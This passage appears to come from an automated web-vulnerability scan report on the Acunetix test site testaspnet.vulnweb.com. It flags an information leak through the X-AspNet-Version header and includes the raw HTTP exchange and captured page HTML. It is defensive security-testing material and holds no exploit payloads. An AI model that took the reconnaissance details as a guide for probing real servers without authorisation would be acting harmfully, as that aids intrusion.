title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        10. GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (341 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=2
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 30393
          
          
          Response body (30393 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjZGRk4+8K4F/0js11lBw12IN/OFdqHcc=" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKpz/fHDgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q90tjPbD69UwpHdROB4Qqxfz1aHXA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
